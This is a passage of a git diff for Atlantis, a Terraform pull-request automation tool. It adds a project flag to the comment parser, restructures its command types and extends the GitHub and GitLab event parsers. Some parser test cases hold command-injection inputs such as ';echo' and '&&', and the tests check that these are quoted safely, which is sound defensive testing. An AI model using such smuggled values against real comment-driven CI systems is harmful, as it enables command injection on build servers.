+ flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.")
+ flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Which project to run plan for. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename))
flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
case Apply.String():
name = Apply
flagSet = pflag.NewFlagSet(Apply.String(), pflag.ContinueOnError)
flagSet.SetOutput(ioutil.Discard)
- flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Apply the plan for this Terraform workspace.")
- flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Apply the plan for this directory, relative to root of repo. Use '.' for root. If not specified, will run apply against all plans created for this workspace.")
+ flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.")
+ flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.")
+ flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Apply the plan for this project. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename))
flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
default:
return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)}
@@ -197,8 +204,18 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
return CommentParseResult{CommentResponse: e.errMarkdown(fmt.Sprintf("invalid workspace: %q", workspace), command, flagSet)}
}
+ // If project is specified, dir or workspace should not be set. Since we
+ // dir/workspace have defaults we can't detect if the user set the flag
+ // to the default or didn't set the flag so there is an edge case here we
+ // don't detect, ex. atlantis plan -p project -d . -w default won't cause
+ // an error.
+ if project != "" && (workspace != DefaultWorkspace || dir != DefaultDir) {
+ err := fmt.Sprintf("cannot use -%s/--%s at same time as -%s/--%s or -%s/--%s", ProjectFlagShort, ProjectFlagLong, DirFlagShort, DirFlagLong, WorkspaceFlagShort, WorkspaceFlagLong)
+ return CommentParseResult{CommentResponse: e.errMarkdown(err, command, flagSet)}
+ }
+
return CommentParseResult{
- Command: &Command{Name: name, Verbose: verbose, Workspace: workspace, Dir: dir, Flags: extraArgs},
+ Command: NewCommentCommand(dir, extraArgs, name, verbose, workspace, project),
}
}
diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go
index 87b14f358b..de127c7b8f 100644
--- a/server/events/comment_parser_test.go
+++ b/server/events/comment_parser_test.go
@@ -31,8 +31,6 @@ var commentParser = events.CommentParser{
}
func TestParse_Ignored(t *testing.T) {
- t.Log("given a comment that should be ignored we should set " +
- "CommentParseResult.Ignore to true")
ignoreComments := []string{
"",
"a",
@@ -47,8 +45,6 @@ func TestParse_Ignored(t *testing.T) {
}
func TestParse_HelpResponse(t *testing.T) {
- t.Log("given a comment that should result in help output we " +
- "should set CommentParseResult.CommentResult")
helpComments := []string{
"run",
"atlantis",
@@ -259,6 +255,22 @@ func TestParse_InvalidWorkspace(t *testing.T) {
}
}
+func TestParse_UsingProjectAtSameTimeAsWorkspaceOrDir(t *testing.T) {
+ cases := []string{
+ "atlantis plan -w workspace -p project",
+ "atlantis plan -d dir -p project",
+ "atlantis plan -d dir -w workspace -p project",
+ }
+ for _, c := range cases {
+ t.Run(c, func(t *testing.T) {
+ r := commentParser.Parse(c, models.Github)
+ exp := "Error: cannot use -p/--project at same time as -d/--dir or -w/--workspace"
+ Assert(t, strings.Contains(r.CommentResponse, exp),
+ "For comment %q expected CommentResponse %q to contain %q", c, r.CommentResponse, exp)
+ })
+ }
+}
+
func TestParse_Parsing(t *testing.T) {
cases := []struct {
flags string
@@ -266,22 +278,25 @@ func TestParse_Parsing(t *testing.T) {
expDir string
expVerbose bool
expExtraArgs string
+ expProject string
}{
// Test defaults.
{
"",
"default",
- "",
+ ".",
false,
"",
+ "",
},
- // Test each flag individually.
+ // Test each short flag individually.
{
"-w workspace",
"workspace",
- "",
+ ".",
false,
"",
+ "",
},
{
"-d dir",
@@ -289,13 +304,48 @@ func TestParse_Parsing(t *testing.T) {
"dir",
false,
"",
+ "",
},
{
- "--verbose",
+ "-p project",
"default",
+ ".",
+ false,
"",
+ "project",
+ },
+ {
+ "--verbose",
+ "default",
+ ".",
true,
"",
+ "",
+ },
+ // Test each long flag individually.
+ {
+ "--workspace workspace",
+ "workspace",
+ ".",
+ false,
+ "",
+ "",
+ },
+ {
+ "--dir dir",
+ "default",
+ "dir",
+ false,
+ "",
+ "",
+ },
+ {
+ "--project project",
+ "default",
+ ".",
+ false,
+ "",
+ "project",
},
// Test all of them with different permutations.
{
@@ -304,6 +354,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"",
+ "",
},
{
"-d dir -w workspace --verbose",
@@ -311,6 +362,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"",
+ "",
},
{
"--verbose -w workspace -d dir",
@@ -318,6 +370,23 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"",
+ "",
+ },
+ {
+ "-p project --verbose",
+ "default",
+ ".",
+ true,
+ "",
+ "project",
+ },
+ {
+ "--verbose -p project",
+ "default",
+ ".",
+ true,
+ "",
+ "project",
},
// Test that flags after -- are ignored
{
@@ -326,29 +395,33 @@ func TestParse_Parsing(t *testing.T) {
"dir",
false,
"\"--verbose\"",
+ "",
},
{
"-w workspace -- -d dir --verbose",
"workspace",
- "",
+ ".",
false,
"\"-d\" \"dir\" \"--verbose\"",
+ "",
},
// Test the extra args parsing.
{
"--",
"default",
- "",
+ ".",
false,
"",
+ "",
},
// Test trying to escape quoting
{
"-- \";echo \"hi",
"default",
- "",
+ ".",
false,
`"\";echo" "\"hi"`,
+ "",
},
{
"-w workspace -d dir --verbose -- arg one -two --three &&",
@@ -356,6 +429,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+ "",
},
// Test whitespace.
{
@@ -364,6 +438,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+ "",
},
{
" -w workspace -d dir --verbose -- arg one -two --three &&",
@@ -371,6 +446,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+ "",
},
// Test that the dir string is normalized.
{
@@ -379,6 +455,7 @@ func TestParse_Parsing(t *testing.T) {
".",
false,
"",
+ "",
},
{
"-d /adir",
@@ -386,6 +463,7 @@ func TestParse_Parsing(t *testing.T) {
"adir",
false,
"",
+ "",
},
{
"-d .",
@@ -393,6 +471,7 @@ func TestParse_Parsing(t *testing.T) {
".",
false,
"",
+ "",
},
{
"-d ./",
@@ -400,6 +479,7 @@ func TestParse_Parsing(t *testing.T) {
".",
false,
"",
+ "",
},
{
"-d ./adir",
@@ -407,6 +487,7 @@ func TestParse_Parsing(t *testing.T) {
"adir",
false,
"",
+ "",
},
}
for _, test := range cases {
@@ -414,7 +495,7 @@ func TestParse_Parsing(t *testing.T) {
comment := fmt.Sprintf("atlantis %s %s", cmdName, test.flags)
r := commentParser.Parse(comment, models.Github)
Assert(t, r.CommentResponse == "", "CommentResponse should have been empty but was %q for comment %q", r.CommentResponse, comment)
- Assert(t, test.expDir == r.Command.Dir, "exp dir to equal %q but was %q for comment %q", test.expDir, r.Command.Dir, comment)
+ Assert(t, test.expDir == r.Command.RepoRelDir, "exp dir to equal %q but was %q for comment %q", test.expDir, r.Command.RepoRelDir, comment)
Assert(t, test.expWorkspace == r.Command.Workspace, "exp workspace to equal %q but was %q for comment %q", test.expWorkspace, r.Command.Workspace, comment)
Assert(t, test.expVerbose == r.Command.Verbose, "exp verbose to equal %v but was %v for comment %q", test.expVerbose, r.Command.Verbose, comment)
actExtraArgs := strings.Join(r.Command.Flags, " ")
@@ -430,10 +511,11 @@ func TestParse_Parsing(t *testing.T) {
}
var PlanUsage = `Usage of plan:
- -d, --dir string Which directory to run plan in relative to root of repo.
- Use '.' for root. If not specified, will attempt to run
- plan for all Terraform projects we think were modified in
- this changeset.
+ -d, --dir string Which directory to run plan in relative to root of repo,
+ ex. 'child/dir'. (default ".")
+ -p, --project string Which project to run plan for. Refers to the name of the
+ project configured in atlantis.yaml. Cannot be used at
+ same time as workspace or dir flags.
--verbose Append Atlantis log to comment.
-w, --workspace string Switch to this Terraform workspace before planning.
(default "default")
@@ -441,8 +523,10 @@ var PlanUsage = `Usage of plan:
var ApplyUsage = `Usage of apply:
-d, --dir string Apply the plan for this directory, relative to root of
- repo. Use '.' for root. If not specified, will run apply
- against all plans created for this workspace.
+ repo, ex. 'child/dir'. (default ".")
+ -p, --project string Apply the plan for this project. Refers to the name of
+ the project configured in atlantis.yaml. Cannot be used
+ at same time as workspace or dir flags.
--verbose Append Atlantis log to comment.
-w, --workspace string Apply the plan for this Terraform workspace. (default
"default")
diff --git a/server/events/commit_status_updater.go b/server/events/commit_status_updater.go
index 3debcd43fe..ba5a235036 100644
--- a/server/events/commit_status_updater.go
+++ b/server/events/commit_status_updater.go
@@ -27,10 +27,10 @@ import (
// the status to signify whether the plan/apply succeeds.
type CommitStatusUpdater interface {
// Update updates the status of the head commit of pull.
- Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error
+ Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error
// UpdateProjectResult updates the status of the head commit given the
// state of response.
- UpdateProjectResult(ctx *CommandContext, res CommandResponse) error
+ UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error
}
// DefaultCommitStatusUpdater implements CommitStatusUpdater.
@@ -39,13 +39,13 @@ type DefaultCommitStatusUpdater struct {
}
// Update updates the commit status.
-func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error {
- description := fmt.Sprintf("%s %s", strings.Title(cmd.Name.String()), strings.Title(status.String()))
+func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error {
+ description := fmt.Sprintf("%s %s", strings.Title(command.String()), strings.Title(status.String()))
return d.Client.UpdateStatus(repo, pull, status, description)
}
// UpdateProjectResult updates the commit status based on the status of res.
-func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, res CommandResponse) error {
+func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error {
var status vcs.CommitStatus
if res.Error != nil || res.Failure != "" {
status = vcs.Failed
@@ -56,7 +56,7 @@ func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, re
}
status = d.worstStatus(statuses)
}
- return d.Update(ctx.BaseRepo, ctx.Pull, status, ctx.Command)
+ return d.Update(ctx.BaseRepo, ctx.Pull, status, commandName)
}
func (d *DefaultCommitStatusUpdater) worstStatus(ss []vcs.CommitStatus) vcs.CommitStatus {
diff --git a/server/events/commit_status_updater_test.go b/server/events/commit_status_updater_test.go
index 7d05264b04..155822dc19 100644
--- a/server/events/commit_status_updater_test.go
+++ b/server/events/commit_status_updater_test.go
@@ -29,26 +29,12 @@ import (
var repoModel = models.Repo{}
var pullModel = models.PullRequest{}
var status = vcs.Success
-var cmd = events.Command{
- Name: events.Plan,
-}
-
-func TestStatus_String(t *testing.T) {
- cases := map[vcs.CommitStatus]string{
- vcs.Pending: "pending",
- vcs.Success: "success",
- vcs.Failed: "failed",
- }
- for k, v := range cases {
- Equals(t, v, k.String())
- }
-}
func TestUpdate(t *testing.T) {
RegisterMockTestingT(t)
client := mocks.NewMockClientProxy()
s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.Update(repoModel, pullModel, status, &cmd)
+ err := s.Update(repoModel, pullModel, status, events.Plan)
Ok(t, err)
client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, status, "Plan Success")
}
@@ -58,11 +44,10 @@ func TestUpdateProjectResult_Error(t *testing.T) {
ctx := &events.CommandContext{
BaseRepo: repoModel,
Pull: pullModel,
- Command: &events.Command{Name: events.Plan},
}
client := mocks.NewMockClientProxy()
s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.UpdateProjectResult(ctx, events.CommandResponse{Error: errors.New("err")})
+ err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Error: errors.New("err")})
Ok(t, err)
client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed")
}
@@ -72,23 +57,20 @@ func TestUpdateProjectResult_Failure(t *testing.T) {
ctx := &events.CommandContext{
BaseRepo: repoModel,
Pull: pullModel,
- Command: &events.Command{Name: events.Plan},
}
client := mocks.NewMockClientProxy()
s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.UpdateProjectResult(ctx, events.CommandResponse{Failure: "failure"})
+ err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Failure: "failure"})
Ok(t, err)
client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed")
}
func TestUpdateProjectResult(t *testing.T) {
- t.Log("should use worst status")
RegisterMockTestingT(t)
ctx := &events.CommandContext{
BaseRepo: repoModel,
Pull: pullModel,
- Command: &events.Command{Name: events.Plan},
}
cases := []struct {
@@ -126,25 +108,31 @@ func TestUpdateProjectResult(t *testing.T) {
}
for _, c := range cases {
- var results []events.ProjectResult
- for _, statusStr := range c.Statuses {
- var result events.ProjectResult
- switch statusStr {
- case "failure":
- result = events.ProjectResult{Failure: "failure"}
- case "error":
- result = events.ProjectResult{Error: errors.New("err")}
- default:
- result = events.ProjectResult{}
+ t.Run(strings.Join(c.Statuses, "-"), func(t *testing.T) {
+ var results []events.ProjectResult
+ for _, statusStr := range c.Statuses {
+ var result events.ProjectResult
+ switch statusStr {
+ case "failure":
+ result = events.ProjectResult{
+ ProjectCommandResult: events.ProjectCommandResult{Failure: "failure"},
+ }
+ case "error":
+ result = events.ProjectResult{
+ ProjectCommandResult: events.ProjectCommandResult{Error: errors.New("err")},
+ }
+ default:
+ result = events.ProjectResult{}
+ }
+ results = append(results, result)
}
- results = append(results, result)
- }
- resp := events.CommandResponse{ProjectResults: results}
+ resp := events.CommandResult{ProjectResults: results}
- client := mocks.NewMockClientProxy()
- s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.UpdateProjectResult(ctx, resp)
- Ok(t, err)
- client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String()))
+ client := mocks.NewMockClientProxy()
+ s := events.DefaultCommitStatusUpdater{Client: client}
+ err := s.UpdateProjectResult(ctx, events.Plan, resp)
+ Ok(t, err)
+ client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String()))
+ })
}
}
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index d42e4beda0..33504cd40d 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -14,7 +14,10 @@
package events
import (
+ "fmt"
+ "path"
"regexp"
+ "strings"
"github.com/google/go-github/github"
"github.com/lkysow/go-gitlab"
@@ -31,22 +34,88 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`)
//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing
-type Command struct {
+type CommandInterface interface {
+ CommandName() CommandName
+ IsVerbose() bool
+ IsAutoplan() bool
+}
+
+type AutoplanCommand struct{}
+
+func (c AutoplanCommand) CommandName() CommandName {
+ return Plan
+}
+
+func (c AutoplanCommand) IsVerbose() bool {
+ return false
+}
+
+func (c AutoplanCommand) IsAutoplan() bool {
+ return true
+}
+
+type CommentCommand struct {
+ // RepoRelDir is the path relative to the repo root to run the command in.
+ // Will never be an empty string and will never end in "/".
+ RepoRelDir string
+ // CommentArgs are the extra arguments appended to comment,
+ // ex. atlantis plan -- -target=resource
+ Flags []string
Name CommandName
- Workspace string
Verbose bool
- Flags []string
- // Dir is the path relative to the repo root to run the command in.
- // If empty string then it wasn't specified. "." is the root of the repo.
- // Dir will never end in "/".
- Dir string
+ Workspace string
+ // ProjectName is the name of a project to run the command on. It refers to a
+ // project specified in an atlantis.yaml file.
+ ProjectName string
+}
+
+func (c CommentCommand) CommandName() CommandName {
+ return c.Name
+}
+
+func (c CommentCommand) IsVerbose() bool {
+ return c.Verbose
+}
+
+func (c CommentCommand) IsAutoplan() bool {
+ return false
+}
+
+func (c CommentCommand) String() string {
+ return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.RepoRelDir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ","))
+}
+
+// NewCommentCommand constructs a CommentCommand, setting all missing fields to defaults.
+func NewCommentCommand(repoRelDir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
+ // If repoRelDir was an empty string, this will return '.'.
+ validDir := path.Clean(repoRelDir)
+ if validDir == "/" {
+ validDir = "."
+ }
+ if workspace == "" {
+ workspace = DefaultWorkspace
+ }
+ return &CommentCommand{
+ RepoRelDir: validDir,
+ Flags: flags,
+ Name: name,
+ Verbose: verbose,
+ Workspace: workspace,
+ ProjectName: project,
+ }
}
type EventParsing interface {
ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error)
- ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error)
+ // ParseGithubPull returns the pull request, base repo and head repo.
+ ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error)
+ // ParseGithubPullEvent returns the pull request, head repo and user that
+ // caused the event. Base repo is available as a field on PullRequest.
+ ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (pull models.PullRequest, baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error)
- ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error)
+ // ParseGitlabMergeEvent returns the pull request, base repo, head repo and
+ // user that caused the event.
+ ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error)
ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest
}
@@ -79,38 +148,58 @@ func (e *EventParser) ParseGithubIssueCommentEvent(comment *github.IssueCommentE
return
}
-func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) {
- var pullModel models.PullRequest
- var headRepoModel models.Repo
+func (e *EventParser) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
+ if pullEvent.PullRequest == nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("pull_request is null")
+ }
+ pull, baseRepo, headRepo, err := e.ParseGithubPull(pullEvent.PullRequest)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+ }
+ if pullEvent.Sender == nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender is null")
+ }
+ senderUsername := pullEvent.Sender.GetLogin()
+ if senderUsername == "" {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender.login is null")
+ }
+ return pull, baseRepo, headRepo, models.User{Username: senderUsername}, nil
+}
+func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (pullModel models.PullRequest, baseRepo models.Repo, headRepo models.Repo, err error) {
commit := pull.Head.GetSHA()
if commit == "" {
- return pullModel, headRepoModel, errors.New("head.sha is null")
+ err = errors.New("head.sha is null")
+ return
}
url := pull.GetHTMLURL()
if url == "" {
- return pullModel, headRepoModel, errors.New("html_url is null")
+ err = errors.New("html_url is null")
+ return
}
branch := pull.Head.GetRef()
if branch == "" {
- return pullModel, headRepoModel, errors.New("head.ref is null")
+ err = errors.New("head.ref is null")
+ return
}
authorUsername := pull.User.GetLogin()
if authorUsername == "" {
- return pullModel, headRepoModel, errors.New("user.login is null")
+ err = errors.New("user.login is null")
+ return
}
num := pull.GetNumber()
if num == 0 {
- return pullModel, headRepoModel, errors.New("number is null")
+ err = errors.New("number is null")
+ return
}
- baseRepoModel, err := e.ParseGithubRepo(pull.Base.Repo)
+ baseRepo, err = e.ParseGithubRepo(pull.Base.Repo)
if err != nil {
- return pullModel, headRepoModel, err
+ return
}
- headRepoModel, err = e.ParseGithubRepo(pull.Head.Repo)
+ headRepo, err = e.ParseGithubRepo(pull.Head.Repo)
if err != nil {
- return pullModel, headRepoModel, err
+ return
}
pullState := models.Closed
@@ -118,22 +207,23 @@ func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequ
pullState = models.Open
}
- return models.PullRequest{
+ pullModel = models.PullRequest{
Author: authorUsername,
Branch: branch,
HeadCommit: commit,
URL: url,
Num: num,
State: pullState,
- BaseRepo: baseRepoModel,
- }, headRepoModel, nil
+ BaseRepo: baseRepo,
+ }
+ return
}
func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) {
return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken)
}
-func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) {
+func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
modelState := models.Closed
if event.ObjectAttributes.State == gitlabPullOpened {
modelState = models.Open
@@ -141,7 +231,15 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
// GitLab also has a "merged" state, but we map that to Closed so we don't
// need to check for it.
- repo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+ baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+ }
+ headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+ }
+
pull := models.PullRequest{
URL: event.ObjectAttributes.URL,
Author: event.User.Username,
@@ -149,10 +247,14 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
HeadCommit: event.ObjectAttributes.LastCommit.ID,
Branch: event.ObjectAttributes.SourceBranch,
State: modelState,
- BaseRepo: repo,
+ BaseRepo: baseRepo,
+ }
+
+ user := models.User{
+ Username: event.User.Username,
}
- return pull, repo, err
+ return pull, baseRepo, headRepo, user, err
}
// ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event.
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index 9928dc69c9..edecf5874d 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -102,34 +102,91 @@ func TestParseGithubIssueCommentEvent(t *testing.T) {
Equals(t, *comment.Issue.Number, pullNum)
}
+func TestParseGithubPullEvent(t *testing.T) {
+ _, _, _, _, err := parser.ParseGithubPullEvent(&github.PullRequestEvent{})
+ ErrEquals(t, "pull_request is null", err)
+
+ testEvent := deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+ testEvent.PullRequest.HTMLURL = nil
+ _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+ ErrEquals(t, "html_url is null", err)
+
+ testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+ testEvent.Sender = nil
+ _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+ ErrEquals(t, "sender is null", err)
+
+ testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+ testEvent.Sender.Login = nil
+ _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+ ErrEquals(t, "sender.login is null", err)
+
+ actPull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGithubPullEvent(&PullEvent)
+ Ok(t, err)
+ expBaseRepo := models.Repo{
+ Owner: "owner",
+ FullName: "owner/repo",
+ CloneURL: "https://github-user:github-token@github.com/owner/repo.git",
+ SanitizedCloneURL: Repo.GetCloneURL(),
+ Name: "repo",
+ VCSHost: models.VCSHost{
+ Hostname: "github.com",
+ Type: models.Github,
+ },
+ }
+ Equals(t, expBaseRepo, actBaseRepo)
+ Equals(t, expBaseRepo, actHeadRepo)
+ Equals(t, models.PullRequest{
+ URL: Pull.GetHTMLURL(),
+ Author: Pull.User.GetLogin(),
+ Branch: Pull.Head.GetRef(),
+ HeadCommit: Pull.Head.GetSHA(),
+ Num: Pull.GetNumber(),
+ State: models.Open,
+ BaseRepo: expBaseRepo,
+ }, actPull)
+ Equals(t, models.User{Username: "user"}, actUser)
+}
+
func TestParseGithubPull(t *testing.T) {
testPull := deepcopy.Copy(Pull).(github.PullRequest)
testPull.Head.SHA = nil
- _, _, err := parser.ParseGithubPull(&testPull)
+ _, _, _, err := parser.ParseGithubPull(&testPull)
ErrEquals(t, "head.sha is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.HTMLURL = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "html_url is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.Head.Ref = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "head.ref is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.User.Login = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "user.login is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.Number = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "number is null", err)
- pullRes, _, err := parser.ParseGithubPull(&Pull)
+ pullRes, actBaseRepo, actHeadRepo, err := parser.ParseGithubPull(&Pull)
Ok(t, err)
+ expBaseRepo := models.Repo{
+ Owner: "owner",
+ FullName: "owner/repo",
+ CloneURL: "https://github-user:github-token@github.com/owner/repo.git",
+ SanitizedCloneURL: Repo.GetCloneURL(),
+ Name: "repo",
+ VCSHost: models.VCSHost{
+ Hostname: "github.com",
+ Type: models.Github,
+ },
+ }
Equals(t, models.PullRequest{
URL: Pull.GetHTMLURL(),
Author: Pull.User.GetLogin(),
@@ -137,18 +194,10 @@ func TestParseGithubPull(t *testing.T) {
HeadCommit: Pull.Head.GetSHA(),
Num: Pull.GetNumber(),
State: models.Open,
- BaseRepo: models.Repo{
- Owner: "owner",
- FullName: "owner/repo",
- CloneURL: "https://github-user:github-token@github.com/owner/repo.git",
- SanitizedCloneURL: Repo.GetCloneURL(),
- Name: "repo",
- VCSHost: models.VCSHost{
- Hostname: "github.com",
- Type: models.Github,
- },
- },
+ BaseRepo: expBaseRepo,
}, pullRes)
+ Equals(t, expBaseRepo, actBaseRepo)
+ Equals(t, expBaseRepo, actHeadRepo)
}
func TestParseGitlabMergeEvent(t *testing.T) {
@@ -156,10 +205,10 @@ func TestParseGitlabMergeEvent(t *testing.T) {
var event *gitlab.MergeEvent
err := json.Unmarshal([]byte(mergeEventJSON), &event)
Ok(t, err)
- pull, repo, err := parser.ParseGitlabMergeEvent(*event)
+ pull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGitlabMergeEvent(*event)
Ok(t, err)
- expRepo := models.Repo{
+ expBaseRepo := models.Repo{
FullName: "gitlabhq/gitlab-test",
Name: "gitlab-test",
SanitizedCloneURL: "https://example.com/gitlabhq/gitlab-test.git",
@@ -178,14 +227,26 @@ func TestParseGitlabMergeEvent(t *testing.T) {
HeadCommit: "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
Branch: "ms-viewport",
State: models.Open,
- BaseRepo: expRepo,
+ BaseRepo: expBaseRepo,
}, pull)
- Equals(t, expRepo, repo)
+ Equals(t, expBaseRepo, actBaseRepo)
+ Equals(t, models.Repo{
+ FullName: "awesome_space/awesome_project",
+ Name: "awesome_project",
+ SanitizedCloneURL: "http://example.com/awesome_space/awesome_project.git",
+ Owner: "awesome_space",
+ CloneURL: "http://gitlab-user:gitlab-token@example.com/awesome_space/awesome_project.git",
+ VCSHost: models.VCSHost{
+ Hostname: "example.com",
+ Type: models.Gitlab,
+ },
+ }, actHeadRepo)
+ Equals(t, models.User{Username: "root"}, actUser)
t.Log("If the state is closed, should set field correctly.")
event.ObjectAttributes.State = "closed"
- pull, _, err = parser.ParseGitlabMergeEvent(*event)
+ pull, _, _, _, err = parser.ParseGitlabMergeEvent(*event)
Ok(t, err)
Equals(t, models.Closed, pull.State)
}
@@ -257,6 +318,101 @@ func TestParseGitlabMergeCommentEvent(t *testing.T) {
}, user)
}
+func TestNewCommand_CleansDir(t *testing.T) {
+ cases := []struct {
+ RepoRelDir string
